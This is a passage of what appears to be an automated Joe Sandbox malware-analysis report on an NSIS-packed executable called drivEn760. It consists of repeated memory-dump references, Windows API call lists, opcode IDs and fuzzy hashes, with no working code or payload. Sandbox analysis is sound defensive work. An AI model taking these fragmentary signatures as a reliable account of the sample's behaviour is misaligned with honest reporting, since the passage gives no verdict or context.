                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything
                                                                                                            • API String ID: 1892508949-2643781576
                                                                                                            • Opcode ID: ff9909915b16c23767ee925164981e8f632181fd0fe0b495a8c7e415af322c96
                                                                                                            • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                                            • Opcode Fuzzy Hash: ff9909915b16c23767ee925164981e8f632181fd0fe0b495a8c7e415af322c96
                                                                                                            • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00405FF0
                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                                            • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00406098
                                                                                                            • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0), ref: 004060A8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: P_B
                                                                                                            • API String ID: 3248276644-906794629
                                                                                                            • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                                            • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                                            • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                                            • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Delete on reboot: ,?,?,0040679D,80000002), ref: 0040657C
                                                                                                            • RegCloseKey.KERNELBASE(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Delete on reboot: ,Delete on reboot: ,Delete on reboot: ,00000000,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\), ref: 00406587
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID: Delete on reboot:
                                                                                                            • API String ID: 3356406503-2410499825
                                                                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                            • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                            • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                                            • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                                            • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                                            • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                                            • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                                            • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                                            • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                                            • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                                            • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                                            • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                                            • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                                            • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                                            • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                                            • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                                            • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                                            • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                                            • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                                            • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                                            • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                                            • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                                            • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                                            • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 0040348D
                                                                                                              • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                                            • SetFilePointer.KERNELBASE(003958A8,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer$CountTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092082344-0
                                                                                                            • Opcode ID: b6fa8e05c39a3eb1371992615b1ce168f5932a73c668b0927bcdab247065a340
                                                                                                            • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                                            • Opcode Fuzzy Hash: b6fa8e05c39a3eb1371992615b1ce168f5932a73c668b0927bcdab247065a340
                                                                                                            • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,004030A8,004030A8,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000), ref: 00405725
                                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\), ref: 00405737
                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
